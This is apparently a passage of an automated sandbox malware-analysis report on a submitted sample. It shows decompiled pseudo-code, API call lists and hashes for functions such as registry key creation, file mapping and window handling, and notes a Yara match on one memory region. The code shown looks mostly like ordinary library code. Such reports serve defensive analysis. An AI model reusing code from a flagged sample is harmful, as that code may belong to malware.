                  • API String ID: 2169720751-0
                  • Opcode ID: dfdcc4aceaedbd86c3665efdada2bbe5d0073950082cda493ab0cb21491c4667
                  • Instruction ID: 0560ffd8090ea321ddfb3cc0bc89d5341b088f6257bcd32caec06168c9843b40
                  • Opcode Fuzzy Hash: dfdcc4aceaedbd86c3665efdada2bbe5d0073950082cda493ab0cb21491c4667
                  • Instruction Fuzzy Hash: E621F171200700BFCB219F25CCC8F6E7BA4BF44740F24452AF589A72E0D7B8B8508B5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00440043, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 69COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00440043() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x468660;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x468660 = _t5;
				}
				_t6 = E004381D6(_t5, 4);
				 *0x467648 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x463fd0;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x464250) {
							break;
						}
						_t6 =  *0x467648; // 0x24320d0
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x463fe0;
					do {
						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x468680 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x464040);
					return 0;
				} else {
					 *0x468660 = _t26;
					_t6 = E004381D6(_t26, 4);
					 *0x467648 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}













                  0x00440043
                  0x0044004b
                  0x0044004e
                  0x00440059
                  0x0044005b
                  0x00000000
                  0x0044005b
                  0x00440050
                  0x00440050
                  0x0044005d
                  0x0044005d
                  0x0044005d
                  0x00440065
                  0x0044006c
                  0x00440073
                  0x00440093
                  0x00440093
                  0x00440095
                  0x004400a1
                  0x004400a1
                  0x004400a4
                  0x004400a7
                  0x004400b0
                  0x00000000
                  0x00000000
                  0x0044009c
                  0x0044009c
                  0x004400b4
                  0x004400b5
                  0x004400b7
                  0x004400bd
                  0x004400d1
                  0x004400d7
                  0x004400e1
                  0x004400e1
                  0x004400e3
                  0x004400e6
                  0x004400e7
                  0x004400f3
                  0x00440075
                  0x00440078
                  0x0044007e
                  0x00440085
                  0x0044008c
                  0x00000000
                  0x0044008e
                  0x00440090
                  0x00440092
                  0x00440092
                  0x0044008c

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __calloc_crt
                  • String ID: @@F$PBF$`vF$?F
                  • API String ID: 3494438863-1129309999
                  • Opcode ID: 1a2e1c73d2f0b5ee1c020fbac76cde2fdd918bf510956deff6eadb29a4ec2292
                  • Instruction ID: a5c93d0391fce3b3b5f1e76609cc71b27c325a532c4fd8429ec35ff82f20e995
                  • Opcode Fuzzy Hash: 1a2e1c73d2f0b5ee1c020fbac76cde2fdd918bf510956deff6eadb29a4ec2292
                  • Instruction Fuzzy Hash: 7C1191317097115BF7288E2DBC50B662391A785728F24423FE715DA3A4FAB8D891868E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00426499, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00426499(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}









                  0x004264b6
                  0x004264bd
                  0x004264c0
                  0x004264c3
                  0x004264c6
                  0x004264d1
                  0x00426508
                  0x00426508
                  0x00426513
                  0x00426518
                  0x00426518
                  0x0042651d
                  0x00426522
                  0x00426522
                  0x0042652b

                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 004264C9
                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004264EC
                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00426508
                  • RegCloseKey.ADVAPI32(?), ref: 00426518
                  • RegCloseKey.ADVAPI32(?), ref: 00426522
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseCreate$Open
                  • String ID: software
                  • API String ID: 1740278721-2010147023
                  • Opcode ID: baa5dd68dee05fadf222446a8f3323f9c01591b1d0c43eda07168c0e41c926bb
                  • Instruction ID: 3f12b4e016f44e42d78fa2a8c8e700cc1342d59c6eca5ba0814baf6782e48a0c
                  • Opcode Fuzzy Hash: baa5dd68dee05fadf222446a8f3323f9c01591b1d0c43eda07168c0e41c926bb
                  • Instruction Fuzzy Hash: C411E676D00128BB8B21DF9AEC88CDFBFBCEF89744B5100AAB504A2115D6719A44DBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401000, Relevance: 10.6, APIs: 7, Instructions: 62synchronizationwindowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 62%
                  			E00401000(intOrPtr* _a4) {
				void* _t21;
				intOrPtr* _t38;
				void* _t42;

				_t38 = _a4;
				if(WaitForSingleObject( *(_t38 + 0x10), 0xffffffff) == 0) {
					while(WaitForSingleObject( *(_t38 + 0x18), 0) != 0) {
						ResetEvent( *(_t38 + 0x14));
						_push( *((intOrPtr*)(_t38 + 0x24)));
						_push( *((intOrPtr*)(_t38 + 0x20)));
						_push(_t38);
						_push(_t38 + 8);
						_push( *((intOrPtr*)(_t38 + 4)));
						_push( *_t38);
						_t21 = E004042A0( *_t38);
						_t42 = _t42 + 0x18;
						SetEvent( *(_t38 + 0x14));
						if(_t21 != 0) {
							PostMessageA( *(_t38 + 0xc), 0x402, 0, 0);
							if(WaitForSingleObject( *(_t38 + 0x10), 0xffffffff) == 0) {
								continue;
							}
						}
						break;
					}
				}
				SetEvent( *(_t38 + 0x1c));
				return 0;
			}






                  0x00401008
                  0x00401016
                  0x00401020
                  0x00401030
                  0x0040103c
                  0x00401040
                  0x00401043
                  0x00401047
                  0x00401048
                  0x00401049
                  0x0040104a
                  0x00401052
                  0x00401058
                  0x00401060
                  0x0040106f
                  0x0040107b
                  0x00000000
                  0x00000000
                  0x0040107b
                  0x00000000
                  0x00401060
                  0x0040107e
                  0x00401083
                  0x0040108d

                  APIs
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401012
                  • WaitForSingleObject.KERNEL32(?,00000000), ref: 00401026
                  • ResetEvent.KERNEL32(?), ref: 00401030
                    • Part of subcall function 004042A0: WaitForSingleObject.KERNEL32(?,00000000,?,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 004042CA
                    • Part of subcall function 004042A0: WaitForSingleObject.KERNEL32(?,00000000,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 004042DE
                    • Part of subcall function 004042A0: SendMessageA.USER32(?,00000401,00000064,00000000), ref: 00404353
                  • SetEvent.KERNEL32(?), ref: 00401058
                  • PostMessageA.USER32 ref: 0040106F
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401077
                  • SetEvent.KERNEL32(?), ref: 00401083
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ObjectSingleWait$Event$Message$PostResetSend
                  • String ID:
                  • API String ID: 2693790096-0
                  • Opcode ID: 7c818635be2d97c96777eab090e09d629f6dcbd405f1c48e9043e2034b7e17b1
                  • Instruction ID: 0d77731ecac0447bacbc28320ec0c646970e3b0a9206e2ca7128ab913cbacf71
                  • Opcode Fuzzy Hash: 7c818635be2d97c96777eab090e09d629f6dcbd405f1c48e9043e2034b7e17b1
                  • Instruction Fuzzy Hash: 82111F75200701ABD620DFAADC84E13B3EDBF88B10B108A2DB665D36D0DA74F8008B68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040CEE2, Relevance: 10.6, APIs: 7, Instructions: 61COMMON
                  Download Yara Rule
                  APIs
                  • GetParent.USER32(0000E900), ref: 0040CEF0
                  • GetWindowRect.USER32 ref: 0040CF0B
                  • ScreenToClient.USER32 ref: 0040CF1E
                  • ScreenToClient.USER32 ref: 0040CF27
                  • EqualRect.USER32 ref: 0040CF31
                  • DeferWindowPos.USER32(?,0000E900,00000000,?,?,?,?,00000014), ref: 0040CF59
                  • SetWindowPos.USER32(0000E900,00000000,?,?,?,?,00000014,?,00000001), ref: 0040CF63
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$ClientRectScreen$DeferEqualParent
                  • String ID:
                  • API String ID: 443303494-0
                  • Opcode ID: 9dd0b80c57cd055b5c3aae39b5d4aa4e3f334b3c2dd04950780753353c1d00f6
                  • Instruction ID: cfd9feb092fbb54a836aacfe93016eac0eb2fe96b6d959632a20acd86b66a086
                  • Opcode Fuzzy Hash: 9dd0b80c57cd055b5c3aae39b5d4aa4e3f334b3c2dd04950780753353c1d00f6
                  • Instruction Fuzzy Hash: 5911307650020AFFD7109FA5DC84DAB7BBDFB88710F14852ABD16A3254E730E900CB65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0231D0EA, Relevance: 10.6, APIs: 7, Instructions: 52fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNEL32(02322E20,80000000,00000001,00000000,00000003,00000000,00000000,00000102,?,0231D676,00000102,0231AC19,?,0231AC8F), ref: 0231D0FF
                  • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000,?,?,0231D676,00000102,0231AC19,?,0231AC8F), ref: 0231D114
                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,?,0231D676,00000102,0231AC19,?,0231AC8F), ref: 0231D126
                  • GetFileSize.KERNEL32(00000000,00000000,?,?,0231D676,00000102,0231AC19,?,0231AC8F), ref: 0231D135
                  • UnmapViewOfFile.KERNEL32(00000000,?,?,0231D676,00000102,0231AC19,?,0231AC8F), ref: 0231D14B
                  • CloseHandle.KERNEL32(00000000,?,?,0231D676,00000102,0231AC19,?,0231AC8F), ref: 0231D152
                  • CloseHandle.KERNEL32(00000000,?,?,0231D676,00000102,0231AC19,?,0231AC8F), ref: 0231D159
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                  • String ID:
                  • API String ID: 1223616889-0
                  • Opcode ID: 576a16f398f89dd8e0dc0a833ce92fc83bf94aaa179ec59eab3918353f0bcb3c
                  • Instruction ID: 9547a534eee5277f659b1d9c94988c53b7fa4018f5af1119bbd8b59e4a469c3e
                  • Opcode Fuzzy Hash: 576a16f398f89dd8e0dc0a833ce92fc83bf94aaa179ec59eab3918353f0bcb3c
                  • Instruction Fuzzy Hash: 420131F2A8121C7FF33516A46DCDF7B366CEB59B99F020529FA0191280D7A44C1D4670
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042094A, Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 84%
                  			E0042094A(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t31;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t31 = __ecx;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E00430CF4(0, 0);
				_t22 = E004148C1(_t31, 0, __edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				_t46 = _t23;
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E004063FE(0, _t33, __edi, __esi, _t46);
				}
				 *(_t41 + 0xc) = _t23;
				E00431160(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E00431B73(_t28);
			}












                  0x0042094a
                  0x0042094a
                  0x0042094a
                  0x00420951
                  0x0042095b
                  0x00420967
                  0x0042096d
                  0x00420972
                  0x00420978
                  0x0042097a
                  0x0042097f
                  0x00420985
                  0x00420985
                  0x0042098d
                  0x0042099e
                  0x004209aa
                  0x004209af
                  0x004209b5
                  0x004209b8
                  0x004209bd
                  0x004209c7
                  0x004209c7
                  0x004209ca
                  0x004209d0
                  0x004209db

                  APIs
                  • LeaveCriticalSection.KERNEL32(?), ref: 00420951
                  • __CxxThrowException@8.LIBCMT ref: 0042095B
                    • Part of subcall function 00430CF4: RaiseException.KERNEL32(?,?,?,?), ref: 00430D36
                  • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 00420972
                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 0042097F
                    • Part of subcall function 004063FE: __CxxThrowException@8.LIBCMT ref: 00406414
                  • _memset.LIBCMT ref: 0042099E
                  • TlsSetValue.KERNEL32(?,00000000,0041F372,00406452,00411FA3), ref: 004209AF
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 004209D0
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                  • String ID:
                  • API String ID: 356813703-0
                  • Opcode ID: af9ad24891c458db921cd8b6e4028670f66e224599244f3ca0a8739f32a8bdb8
                  • Instruction ID: 35073c979330c48db295c3963723042328dd249a9d273a9f0c0c6630b77ded6a
                  • Opcode Fuzzy Hash: af9ad24891c458db921cd8b6e4028670f66e224599244f3ca0a8739f32a8bdb8
                  • Instruction Fuzzy Hash: E2118EB4100606AFEB10AF65DC85D6BBBB9FF44318B10C53EF55696662CB34AC60CF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00438A80, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E00438A80(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x45e210);
				E00431818(__ebx, __edi, __esi);
				_t31 = E00436178(__ebx, __edx, __edi, _t35);
				_t15 =  *0x463b44; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0043A0BF(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x463a48; // 0x2431600
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x463620;
								if(__eflags != 0) {
									_push(_t33);
									E004316F6(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x463a48; // 0x2431600
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x463a48; // 0x2431600
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00438B1B();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0043395F(_t29, _t31, 0x20);
				}
				return E0043185D(_t33);
			}










                  0x00438a80
                  0x00438a80
                  0x00438a80
                  0x00438a80
                  0x00438a82
                  0x00438a87
                  0x00438a91
                  0x00438a93
                  0x00438a9b
                  0x00438abc
                  0x00438ac2
                  0x00438ac6
                  0x00438ac9
                  0x00438acc
                  0x00438ad2
                  0x00438ad4
                  0x00438ad6
                  0x00438ad9
                  0x00438adf
                  0x00438ae1
                  0x00438ae3
                  0x00438ae9
                  0x00438aeb
                  0x00438aec
                  0x00438af1
                  0x00438ae9
                  0x00438ae1
                  0x00438af2
                  0x00438af7
                  0x00438afa
                  0x00438b00
                  0x00438b04
                  0x00438b04
                  0x00438b0a
                  0x00438b11
                  0x00438aa3
                  0x00438aa3
                  0x00438aa3
                  0x00438aa8
                  0x00438aac
                  0x00438ab1
                  0x00438ab9

                  APIs
                  • __getptd.LIBCMT ref: 00438A8C
                    • Part of subcall function 00436178: __getptd_noexit.LIBCMT ref: 0043617B
                    • Part of subcall function 00436178: __amsg_exit.LIBCMT ref: 00436188
                  • __amsg_exit.LIBCMT ref: 00438AAC
                  • __lock.LIBCMT ref: 00438ABC
                  • InterlockedDecrement.KERNEL32(?), ref: 00438AD9
                  • InterlockedIncrement.KERNEL32(02431600), ref: 00438B04
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                  • String ID: 6F
                  • API String ID: 4271482742-3517966882
                  • Opcode ID: 6c584e623dab6ad2db5e4a70b67004d1be87bba4eab4fad9846b8a59ee196114
                  • Instruction ID: 2a7e21e7e983cbed5c811cbe98960c0c60f51e7b7e610d5969f46117a2a2e828
                  • Opcode Fuzzy Hash: 6c584e623dab6ad2db5e4a70b67004d1be87bba4eab4fad9846b8a59ee196114
                  • Instruction Fuzzy Hash: 45018231900722ABC725BF65980574AF760AB08725F14601FF80067792DBBC6A41CBDE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00420379, Relevance: 10.5, APIs: 7, Instructions: 30COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00420379(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}





                  0x00420385
                  0x0042038b
                  0x00420392
                  0x00420399
                  0x004203a0
                  0x004203ad
                  0x004203b4
                  0x004203b7
                  0x004203ba
                  0x004203be

                  APIs
                  • GetSysColor.USER32(0000000F), ref: 00420387
                  • GetSysColor.USER32(00000010), ref: 0042038E
                  • GetSysColor.USER32(00000014), ref: 00420395
                  • GetSysColor.USER32(00000012), ref: 0042039C
                  • GetSysColor.USER32(00000006), ref: 004203A3
                  • GetSysColorBrush.USER32(0000000F), ref: 004203B0
                  • GetSysColorBrush.USER32(00000006), ref: 004203B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Color$Brush
                  • String ID:
                  • API String ID: 2798902688-0
                  • Opcode ID: bbd7f8a36c46f4b64160d0f99ed0faba5aa863649304fb25e67fbe5355e6cc7b
                  • Instruction ID: 65459e24616037a58442e39c341cc04108a4acc29dfa35b8cf1959434db4eedb
                  • Opcode Fuzzy Hash: bbd7f8a36c46f4b64160d0f99ed0faba5aa863649304fb25e67fbe5355e6cc7b
                  • Instruction Fuzzy Hash: 2BF0FE719407445BD730BB735D09B47BAD1FFC4710F02092AD2458B990D6B5E441DF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004259EC, Relevance: 9.3, APIs: 6, Instructions: 325COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004252FF: PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 00425341
                    • Part of subcall function 004252FF: SetRectEmpty.USER32(?), ref: 00425365
                    • Part of subcall function 004252FF: GetDesktopWindow.USER32 ref: 0042537D
                    • Part of subcall function 004252FF: LockWindowUpdate.USER32(?,00000000), ref: 0042538E
                    • Part of subcall function 00422744: GetModuleHandleA.KERNEL32(GDI32.DLL,?,00425A15), ref: 0042274E
                    • Part of subcall function 00422744: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 0042275A
                  • GetWindowRect.USER32 ref: 00425A3B
                    • Part of subcall function 0042277C: GetModuleHandleA.KERNEL32(GDI32.DLL), ref: 0042278A
                    • Part of subcall function 0042277C: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 00422798
                  • InflateRect.USER32(?,00000002,00000002), ref: 00425B2D
                  • InflateRect.USER32(?,00000002,00000002), ref: 00425CD3
                    • Part of subcall function 00425158: OffsetRect.USER32(?,?,?), ref: 00425191
                    • Part of subcall function 004258CF: GetCapture.USER32 ref: 004258E2
                    • Part of subcall function 004258CF: SetCapture.USER32(?), ref: 004258F2
                    • Part of subcall function 004258CF: GetCapture.USER32 ref: 004258FE
                    • Part of subcall function 004258CF: GetMessageA.USER32 ref: 00425918
                    • Part of subcall function 004258CF: DispatchMessageA.USER32 ref: 0042594A
                    • Part of subcall function 004258CF: GetCapture.USER32 ref: 004259A8
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Capture$MessageWindow$AddressHandleInflateModuleProc$DesktopDispatchEmptyLockOffsetPeekUpdate
                  • String ID:
                  • API String ID: 221289759-0
                  • Opcode ID: d943f231d7be530f07c4eda08ec3b72a0e252f1dabaf051c3bf496005de74c4f
                  • Instruction ID: ac46d1c6308f4bac6d73068d2dc0d1780985543c5d8d613698189d1b59e5ddf4
                  • Opcode Fuzzy Hash: d943f231d7be530f07c4eda08ec3b72a0e252f1dabaf051c3bf496005de74c4f
                  • Instruction Fuzzy Hash: E8B15A32A00619AFCF01DFA4D881EEE7BBAFF49310F044195FD05AB265D771AA44CB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041BD1E, Relevance: 9.2, APIs: 6, Instructions: 174COMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E0041BD1E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HDC__* _t86;
				intOrPtr* _t87;
				struct HDC__* _t96;
				intOrPtr _t97;
				struct HDC__* _t110;
				intOrPtr _t122;
				intOrPtr* _t126;
				intOrPtr* _t137;
				struct HDC__** _t138;
				intOrPtr _t151;
				intOrPtr _t155;
				signed short _t170;
				void* _t177;
				void* _t178;
				void* _t179;

				_t179 = __eflags;
				_push(0x1c);
				E00431A9B(E0044B973, __ebx, __edi, __esi);
				_t177 = __ecx;
				 *(__ecx + 0x8c) =  *(_t178 + 8);
				_t86 = E00404461(_t179, 0x40);
				 *(_t178 + 8) = _t86;
				 *(_t178 - 4) =  *(_t178 - 4) & 0x00000000;
				_t180 = _t86;
				if(_t86 == 0) {
					_t87 = 0;
					__eflags = 0;
				} else {
					_t87 = E0041A640(__ebx, _t86, __edx, __edi, _t177, _t180);
				}
				 *(_t178 - 4) =  *(_t178 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t177 + 0x134)) = _t87;
				 *((intOrPtr*)( *_t87 + 0x54)) = 0x7009;
				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x134)))) + 0x74)) + 0x14) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x134)))) + 0x74)) + 0x14) | 0x00000040;
				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x134)))) + 0x74)) + 0x14) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x134)))) + 0x74)) + 0x14) & 0xfffffeff;
